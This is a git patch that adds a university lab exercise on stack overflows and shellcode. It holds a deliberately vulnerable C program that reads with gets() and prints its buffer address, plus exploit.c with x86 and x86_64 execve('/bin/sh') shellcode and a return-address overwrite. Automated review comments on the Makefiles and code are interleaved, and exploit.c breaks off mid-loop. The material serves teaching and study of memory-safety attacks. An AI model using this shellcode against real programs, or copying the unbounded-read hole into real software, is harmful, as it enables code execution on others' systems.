From 33f23e8538947d359b086eeaea8ed0291b296243 Mon Sep 17 00:00:00 2001
From: Yorick Barbanneau
Date: Thu, 9 Mar 2023 16:04:48 +0100
Subject: [PATCH] First part of TD5

---
 .../files/q1/Makefile | 34 ++++++++++
 .../files/q1/magic | Bin 0 -> 16680 bytes
 .../files/q1/magic.c | 14 ++++
 .../files/q1/magic.gdb | 2 +
 .../files/q2/Makefile | 35 ++++++++++
 .../files/q2/anodin.c | 23 +++++++
 .../files/q2/anodin.gdb | 2 +
 .../files/q2/exploit.c | 62 ++++++++++++++++++
 .../td5-stackoverflow_shellcode/index.md | 32 +++++++++
 9 files changed, 204 insertions(+)
 create mode 100644 content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/Makefile
 create mode 100755 content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic
 create mode 100644 content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic.c
 create mode 100644 content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic.gdb
 create mode 100644 content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/Makefile
 create mode 100644 content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/anodin.c
 create mode 100644 content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/anodin.gdb
 create mode 100644 content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/exploit.c
 create mode 100644 content/secu_logicielle/td5-stackoverflow_shellcode/index.md

diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/Makefile b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/Makefile
new file mode 100644
index 0000000..28fa0a7
--- /dev/null
+++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/Makefile
@@ -0,0 +1,34 @@
+CC = gcc
+CFLAGS = -Wall -Wextra -O0 -no-pie -lm -g -std=c99 -zexecstack
+SRC = $(wildcard *.c)
+TGT = $(subst .c,,$(SRC))
+BUILD_DIR = build
+DUMP_DIR = dump
+
+
+pframe:
+ curl -o pframe.tgz https://dept-info.labri.fr/~thibault/SecuLog/pframe.tgz && \
+ tar -xf pframe.tgz &&\
+ rm -rf pframe.tgz
+
+.gdbinit:
+
+configure: pframe .gdbinit
+ $(shell echo "python import pframe" > .gdbinit)
+
+$(BUILD_DIR)/%: %.c
+ $(shell mkdir -p $(BUILD_DIR))
+ $(CC) $(CFLAGS) -o $@ $<
+
+build: $(addprefix $(BUILD_DIR)/, $(TGT)))
+
+
+PHONY: %
+gdb_%: $(addprefix $(BUILD_DIR)/, $(subst gdb_,,%))
+ PYTHONPATH=${PWD}/pframe${PYTHONPATH:+:${PYTHONPATH}} \
+ gdb $< --command=$(subst gdb_,,$@).gdb
+
+
+PHONY: clean
+clean:
+ @rm -rf $(BUILD_DIR) pframe .gdbinit
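Review bot: `build: $(addprefix $(BUILD_DIR)/, $(TGT)))` has one closing parenthesis too many, so the stray `)` lands in the prerequisite list and `make build` fails looking for a target literally named `)`. The `PHONY: clean` line (and `PHONY: %`) declares an ordinary target called `PHONY` rather than the special `.PHONY` target, so `clean` is silently skipped whenever a file named `clean` exists; write `.PHONY: clean` and list `build` and `configure` there as well, since neither produces a file of that name. The `pframe` recipe fetches and unpacks a tarball with no integrity check, so a changed or tampered archive goes unnoticed; verifying a pinned digest before extraction, e.g. `sha256sum -c pframe.tgz.sha256 && tar -xf pframe.tgz`, with the expected digest committed alongside the Makefile, would catch that. The q2/Makefile hunk repeats all three points.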
diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic new file mode 100755 index 0000000000000000000000000000000000000000..c3255cfd475fbdb69b49c093d4a35dc2b19ebf50 GIT binary patch literal 16680 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 SyTao5Cvai_G#&s1RPk?I8ZD*(
literal 0
HcmV?d00001

diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic.c b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic.c
new file mode 100644
index 0000000..190d021
--- /dev/null
+++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic.c
@@ -0,0 +1,14 @@
+#include
+#include
+
+#define N 11
+
+int main(int argc, char *argv[]) {
+ long t[N];
+ long i;
+
+ for (i = 0; i <= N; i++)
+ t[i] = 0;
+
+ return t[0];
+}
diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic.gdb b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic.gdb
new file mode 100644
index 0000000..da0e081
--- /dev/null
+++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q1/magic.gdb
@@ -0,0 +1,2 @@
+b main
+r
diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/Makefile b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/Makefile
new file mode 100644
index 0000000..19f37fc
--- /dev/null
+++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/Makefile
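Review bot: The loop `for (i = 0; i <= N; i++)` in magic.c writes `t[N]`, one element past the 11-element array, which is presumably the intentional off-by-one the exercise is built around; a comment on that line such as `/* deliberate off-by-one: i <= N writes one long past t[] */` would stop a later reader or a linter from "fixing" it and breaking the lesson. `argc` and `argv` are unused and warn under the `-Wextra` the Makefile sets; `int main(void)` is enough here. The two `#include` lines show no header name in this rendering, so what the file includes cannot be confirmed from the hunk.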
@@ -0,0 +1,35 @@
+CC = gcc
+CFLAGS = -Wall -Wextra -O0 -no-pie -lm -g -std=c99 -zexecstack
+SRC = $(wildcard *.c)
+TGT = $(subst .c,,$(SRC))
+BUILD_DIR = build
+DUMP_DIR = dump
+
+
+pframe:
+ curl -o pframe.tgz https://dept-info.labri.fr/~thibault/SecuLog/pframe.tgz && \
+ tar -xf pframe.tgz &&\
+ rm -rf pframe.tgz
+
+.gdbinit:
+
+configure: pframe .gdbinit
+ $(shell echo "python import pframe" > .gdbinit)
+
+$(BUILD_DIR)/%: %.c
+ $(shell mkdir -p $(BUILD_DIR))
+ $(CC) $(CFLAGS) -o $@ $<
+
+build: $(addprefix $(BUILD_DIR)/, $(TGT)))
+
+
+PHONY: gdb
+gdb: build/exploit build/anodin configure
+ ./$(BUILD_DIR)/exploit > hack.txt &
+ PYTHONPATH=${PWD}/pframe${PYTHONPATH:+:${PYTHONPATH}} \
+ setarch -R gdb ./$(BUILD_DIR)/anodin --command=$(subst gdb_,,$@).gdb
+ rm hack.txt
+
+PHONY: clean
+clean:
+ @rm -rf $(BUILD_DIR) pframe .gdbinit
diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/anodin.c b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/anodin.c
new file mode 100644
index 0000000..54a048b
--- /dev/null
+++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/anodin.c
@@ -0,0 +1,23 @@
+#include
+#include
+#include
+#include
+
+int litentier(void) {
+ unsigned char buf[64];
+ int i;
+ printf("%p\n", buf);
+ printf("> ");
+ fflush(stdout);
+ gets(buf);
+ i=atoi(buf);
+ return i;
+}
+
+int main(int argc, char *argv[]) {
+ while (1) {
+ int i;
+ i = litentier();
+ printf("ok %d\n", i);
+ }
+}
diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/anodin.gdb b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/anodin.gdb
new file mode 100644
index 0000000..d1f5e22
--- /dev/null
+++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/anodin.gdb
@@ -0,0 +1,2 @@
+b litentier
+r < hack.txt
diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/exploit.c b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/exploit.c
new file mode 100644
index 0000000..8895bbf
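Review bot: In the `gdb` target, `--command=$(subst gdb_,,$@).gdb` expands to `gdb.gdb` because `$@` is `gdb` here rather than `gdb_anodin`, so the `anodin.gdb` script added in this commit is never loaded; write `--command=anodin.gdb`. The recipe also backgrounds `./$(BUILD_DIR)/exploit > hack.txt &` and immediately starts gdb, whose script does `r < hack.txt`, so the file may still be empty or partial when it is read, and since each recipe line runs in its own shell there is no `wait` that could order them; running the writer to completion in the same line as the gdb invocation would make the step deterministic. `rm hack.txt` is skipped whenever gdb exits non-zero, leaving the file behind, which `clean` does not remove either. The stray `)` in `build:`, the `PHONY:` spelling and the unverified `pframe` download noted on q1/Makefile apply here unchanged.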
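Review bot: `gets(buf)` in `litentier` is the deliberately unbounded read into `buf[64]` that the exercise studies (the function was removed from the language in C11, and modern glibc warns at link time even under `-std=c99`), and `printf("%p\n", buf)` is the matching deliberate address disclosure; both lines deserve a comment marking them intentional, e.g. `/* intentionally unsafe: unbounded read into buf[64] (TD5 exercise) */`, so a later reader or linter does not quietly replace them. `atoi(buf)` returns 0 for non-numeric input and is undefined on overflow, so if the exercise does not depend on `atoi` specifically, `strtol` with an `endptr` check reports both cases. `argc` and `argv` in `main` are unused and warn under the `-Wextra` the Makefile sets; `int main(void)` avoids that.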
--- /dev/null +++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q2/exploit.c @@ -0,0 +1,62 @@ +#include +#include + + +unsigned char exploit[1024] = { + 0x90, 0x90, 0x90, 0x90, // A few nops for some margin + 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, + +#ifdef __x86_64__ + /* 64 bit version */ + 0xe8, 0x08, 0x00, 0x00, 0x00, // push the address of what is next + '/','b','i','n','/','s','h','\0', + 0x5f, // pop the address + 0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00, // execve system call + 0x6a, 0x00, // push NULL at the end of the array + 0x48, 0x89, 0xe2, // envp + 0x57, // push adress + 0x48, 0x89, 0xe6, // argv + 0x0f, 0x05, // system call! +#else + /* 32 bit version */ + 0xe8, 0x08, 0x00, 0x00, 0x00, // push the address of what is next + '/','b','i','n','/','s','h','\0', + 0x5b, // pop the adress + 0xb8, 0x0b, 0x00, 0x00, 0x00, // execve system call + 0x6a, 0x00, // push NULL at the end of the array + 0x89, 0xe2, // envp + 0x53, // push adress + 0x89, 0xe1, // argv + 0xcd, 0x80, // system call! +#endif +}; + +int main(void) { + int i; + void **exploit_ptr = (void*) &exploit; + void *ptr; + + fprintf(stderr,"Type the buf address printed by anodin\n"); + scanf("%p", &ptr); + + // Un peu de marge + ptr += 8; + + // écraser l'adresse de retour + for (i = 0; i < 8; i++) + exploit_ptr[64/sizeof(void*)+i] = ptr; + + for (i=0;i